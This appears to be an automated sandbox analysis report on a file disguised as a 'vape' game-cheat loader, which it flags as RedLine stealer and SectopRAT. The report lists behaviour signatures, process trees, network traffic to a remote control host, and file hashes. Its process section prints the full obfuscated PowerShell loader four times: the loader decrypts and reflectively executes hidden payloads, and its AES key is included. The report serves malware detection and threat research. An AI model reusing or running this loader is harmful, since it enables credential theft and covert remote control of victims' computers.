Analysis Overview
Threat Level: Known bad
The file https://workupload.com/file/GZkqaqwNzHr was found to be: Known bad.
Malicious Activity Summary
SectopRAT
SectopRAT payload
RedLine payload
RedLine
Command and Scripting Interpreter: PowerShell
Blocklisted process makes network request
Modifies file permissions
Adds Run key to start application
Suspicious use of FindShellTrayWindow
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Runs ping.exe
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Enumerates system info in registry
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-05-08 16:36
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-08 16:36
Reported
2024-05-08 16:38
Platform
win10v2004-20240426-en
Max time kernel
114s
Max time network
121s
Command Line
Signatures
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
SectopRAT
SectopRAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\Downloads\vape_v4.20\vape v4.10\Loader.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" | C:\Users\Admin\Downloads\vape_v4.20\vape v4.10\Loader.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" | C:\Users\Admin\Downloads\vape_v4.20\vape v4.10\Loader.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" | C:\Users\Admin\Downloads\vape_v4.20\vape v4.10\Loader.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Processes
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://workupload.com/file/GZkqaqwNzHr
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffceba246f8,0x7ffceba24708,0x7ffceba24718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2264,3734926728243744023,1656733297603992480,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2276 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2264,3734926728243744023,1656733297603992480,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2336 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2264,3734926728243744023,1656733297603992480,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2768 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2264,3734926728243744023,1656733297603992480,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3296 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2264,3734926728243744023,1656733297603992480,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3304 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2264,3734926728243744023,1656733297603992480,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5216 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2264,3734926728243744023,1656733297603992480,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5216 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2264,3734926728243744023,1656733297603992480,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=3936 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2264,3734926728243744023,1656733297603992480,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4952 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2264,3734926728243744023,1656733297603992480,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5316 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2264,3734926728243744023,1656733297603992480,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5884 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2264,3734926728243744023,1656733297603992480,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6244 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2264,3734926728243744023,1656733297603992480,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6272 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2264,3734926728243744023,1656733297603992480,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6024 /prefetch:8
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\vape_v4.20\vape v4.10\bapeclient.bat" "
C:\Windows\system32\mode.com
mode 55, 9
C:\Users\Admin\Downloads\vape_v4.20\vape v4.10\Loader.exe
Loader.exe
C:\Windows\system32\PING.EXE
ping localhost -n 5.5
C:\Windows\SYSTEM32\cmd.exe
cmd /c "build.bat"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('df2/HbQQm0ab5H3l1o6SrqU14Nt8EGIlSMVdrnzxC8g='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ixo7/X3y+hfYrDEjbqjCvA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $HvVQH=New-Object System.IO.MemoryStream(,$param_var); $sIXfJ=New-Object System.IO.MemoryStream; $uSIok=New-Object System.IO.Compression.GZipStream($HvVQH, [IO.Compression.CompressionMode]::Decompress); $uSIok.CopyTo($sIXfJ); $uSIok.Dispose(); $HvVQH.Dispose(); $sIXfJ.Dispose(); $sIXfJ.ToArray();}function execute_function($param_var,$param2_var){ $xPBFz=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $OkHSk=$xPBFz.EntryPoint; $OkHSk.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\build.bat';$MApfv=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\build.bat').Split([Environment]::NewLine);foreach ($kmucY in $MApfv) { if ($kmucY.StartsWith(':: ')) { $OehtD=$kmucY.Substring(3); break; }}$payloads_var=[string[]]$OehtD.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
C:\Program Files (x86)\Common Files\Oracle\Java\javapath\java.exe
java --add-opens java.base/java.lang=ALL-UNNAMED -jar vape-loader.jar
C:\Users\Admin\Downloads\vape_v4.20\vape v4.10\Loader.exe
"C:\Users\Admin\Downloads\vape_v4.20\vape v4.10\Loader.exe"
C:\Windows\SYSTEM32\cmd.exe
cmd /c "build.bat"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('df2/HbQQm0ab5H3l1o6SrqU14Nt8EGIlSMVdrnzxC8g='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ixo7/X3y+hfYrDEjbqjCvA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $HvVQH=New-Object System.IO.MemoryStream(,$param_var); $sIXfJ=New-Object System.IO.MemoryStream; $uSIok=New-Object System.IO.Compression.GZipStream($HvVQH, [IO.Compression.CompressionMode]::Decompress); $uSIok.CopyTo($sIXfJ); $uSIok.Dispose(); $HvVQH.Dispose(); $sIXfJ.Dispose(); $sIXfJ.ToArray();}function execute_function($param_var,$param2_var){ $xPBFz=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $OkHSk=$xPBFz.EntryPoint; $OkHSk.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\build.bat';$MApfv=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\build.bat').Split([Environment]::NewLine);foreach ($kmucY in $MApfv) { if ($kmucY.StartsWith(':: ')) { $OehtD=$kmucY.Substring(3); break; }}$payloads_var=[string[]]$OehtD.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
C:\Users\Admin\Downloads\vape_v4.20\vape v4.10\Loader.exe
"C:\Users\Admin\Downloads\vape_v4.20\vape v4.10\Loader.exe"
C:\Windows\SYSTEM32\cmd.exe
cmd /c "build.bat"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('df2/HbQQm0ab5H3l1o6SrqU14Nt8EGIlSMVdrnzxC8g='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ixo7/X3y+hfYrDEjbqjCvA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $HvVQH=New-Object System.IO.MemoryStream(,$param_var); $sIXfJ=New-Object System.IO.MemoryStream; $uSIok=New-Object System.IO.Compression.GZipStream($HvVQH, [IO.Compression.CompressionMode]::Decompress); $uSIok.CopyTo($sIXfJ); $uSIok.Dispose(); $HvVQH.Dispose(); $sIXfJ.Dispose(); $sIXfJ.ToArray();}function execute_function($param_var,$param2_var){ $xPBFz=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $OkHSk=$xPBFz.EntryPoint; $OkHSk.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\build.bat';$MApfv=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\build.bat').Split([Environment]::NewLine);foreach ($kmucY in $MApfv) { if ($kmucY.StartsWith(':: ')) { $OehtD=$kmucY.Substring(3); break; }}$payloads_var=[string[]]$OehtD.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\Downloads\vape_v4.20\vape v4.10\bapeclient.bat"
C:\Windows\system32\mode.com
mode 55, 9
C:\Users\Admin\Downloads\vape_v4.20\vape v4.10\Loader.exe
Loader.exe
C:\Windows\system32\PING.EXE
ping localhost -n 5.5
C:\Windows\SYSTEM32\cmd.exe
cmd /c "build.bat"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('df2/HbQQm0ab5H3l1o6SrqU14Nt8EGIlSMVdrnzxC8g='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ixo7/X3y+hfYrDEjbqjCvA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $HvVQH=New-Object System.IO.MemoryStream(,$param_var); $sIXfJ=New-Object System.IO.MemoryStream; $uSIok=New-Object System.IO.Compression.GZipStream($HvVQH, [IO.Compression.CompressionMode]::Decompress); $uSIok.CopyTo($sIXfJ); $uSIok.Dispose(); $HvVQH.Dispose(); $sIXfJ.Dispose(); $sIXfJ.ToArray();}function execute_function($param_var,$param2_var){ $xPBFz=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $OkHSk=$xPBFz.EntryPoint; $OkHSk.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\build.bat';$MApfv=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\build.bat').Split([Environment]::NewLine);foreach ($kmucY in $MApfv) { if ($kmucY.StartsWith(':: ')) { $OehtD=$kmucY.Substring(3); break; }}$payloads_var=[string[]]$OehtD.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
C:\Program Files (x86)\Common Files\Oracle\Java\javapath\java.exe
java --add-opens java.base/java.lang=ALL-UNNAMED -jar vape-loader.jar
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe"
C:\Users\Admin\Downloads\vape_v4.20\vape v4.10\Loader.exe
Loader.exe
C:\Program Files\Java\jre-1.8\bin\javaw.exe
"C:\Program Files\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\Admin\Downloads\vape_v4.20\vape v4.10\Vape-v4.10.jar"
C:\Program Files\Java\jre-1.8\bin\javaw.exe
"C:\Program Files\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\Admin\Downloads\vape_v4.20\vape v4.10\vape-loader.jar"
C:\Windows\system32\icacls.exe
C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | workupload.com | udp |
| DE | 144.76.176.119:443 | workupload.com | tcp |
| US | 8.8.8.8:53 | fundingchoicesmessages.google.com | udp |
| US | 8.8.8.8:53 | googleads.g.doubleclick.net | udp |
| DE | 144.76.176.119:443 | workupload.com | tcp |
| GB | 216.58.201.98:443 | googleads.g.doubleclick.net | tcp |
| GB | 172.217.16.238:443 | fundingchoicesmessages.google.com | tcp |
| US | 8.8.8.8:53 | t.workupload.com | udp |
| DE | 49.13.126.162:443 | t.workupload.com | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 119.176.76.144.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 77.190.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 66.204.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 98.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 238.16.217.172.in-addr.arpa | udp |
| DE | 144.76.176.119:443 | workupload.com | tcp |
| DE | 144.76.176.119:443 | workupload.com | tcp |
| DE | 144.76.176.119:443 | workupload.com | tcp |
| US | 8.8.8.8:53 | 162.126.13.49.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| DE | 144.76.176.119:443 | workupload.com | tcp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| GB | 88.221.135.57:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.135.221.88.in-addr.arpa | udp |
| GB | 88.221.135.57:443 | www.bing.com | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | f91.workupload.com | udp |
| DE | 116.202.214.189:443 | f91.workupload.com | tcp |
| DE | 116.202.214.189:443 | f91.workupload.com | tcp |
| US | 8.8.8.8:53 | 189.214.202.116.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ii-restored.gl.at.ply.gg | udp |
| US | 147.185.221.16:43416 | ii-restored.gl.at.ply.gg | tcp |
| US | 147.185.221.16:43416 | ii-restored.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | 0.204.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 147.185.221.16:43416 | ii-restored.gl.at.ply.gg | tcp |
| US | 147.185.221.16:43416 | ii-restored.gl.at.ply.gg | tcp |
| US | 147.185.221.16:43416 | ii-restored.gl.at.ply.gg | tcp |
| US | 147.185.221.16:43416 | ii-restored.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 57.169.31.20.in-addr.arpa | udp |
| US | 147.185.221.16:43416 | ii-restored.gl.at.ply.gg | tcp |
| US | 147.185.221.16:43416 | ii-restored.gl.at.ply.gg | tcp |
| US | 147.185.221.16:43416 | ii-restored.gl.at.ply.gg | tcp |
| US | 147.185.221.16:43416 | ii-restored.gl.at.ply.gg | tcp |
Files
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | f53207a5ca2ef5c7e976cbb3cb26d870 |
| SHA1 | 49a8cc44f53da77bb3dfb36fc7676ed54675db43 |
| SHA256 | 19ab4e3c9da6d9cedda7461efdba9a2085e743513ab89f1dd0fd5a8f9486ad23 |
| SHA512 | be734c7e8afda19f445912aef0d78f9941add29baebd4a812bff27f10a1d78b52aeb11c551468c8644443c86e1a2a6b2e4aead3d7f81d39925e3c20406ac1499 |
\??\pipe\LOCAL\crashpad_2196_HBMFMSUIYSIKIFAS
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
